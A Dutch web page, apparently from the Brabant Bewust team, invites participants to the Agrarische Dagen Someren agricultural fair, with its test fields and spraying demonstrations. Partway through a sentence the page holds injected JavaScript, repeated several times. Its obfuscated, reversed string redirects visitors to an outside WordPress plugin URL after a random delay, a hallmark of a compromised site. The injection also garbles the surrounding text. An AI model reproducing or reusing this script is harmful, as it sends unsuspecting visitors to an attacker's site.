,

Uitnodiging – Agrarische Dagen Someren

Zaterdag 7 september (11:00-18:00) en zondag 8 september (10:00-17:00) vindt de 13e editie van de Agrarische Dagen Someren plaats. Dit evenement trekt jaarlijks een groot aantal bezoekers aan, die o.a. komen kijken naar de vele stands, proefvelden en demonstratierondes. Het team van Brabant Bewust zal hier ook aanwezig zijn.

Dit voorjaar is er al hard gewerkt aan de aanleg van het proefveld waar o.a. diverse vormen van grondbewerking en het effect van bodemverdichting door ons worden toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegelicht. Tevens geven wij een demonstratie van diverse spuittechnieken en de vernietiging van groenbemesters en zijn er enkele maisobjecten met verschillende onderzaaitechnieken te bezichtigen.

Graag nodigen wij u, als Brabant Bewust deelnemer, uit om de Agrarische Dagen Someren te bezoeken.
Meer informatie over het evenement (adres, starttijden van demonstraties e.d.) kunt u vinden op www.agrarischedagensomeren.nl

Wij hopen van harte u op 7 of 8 september te mogen verwelkomen op de Agrarische Dagen Someren!

Het Brabant Bewust team

0 antwoorden

Plaats een Reactie

Meepraten?
Draag gerust bij!

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *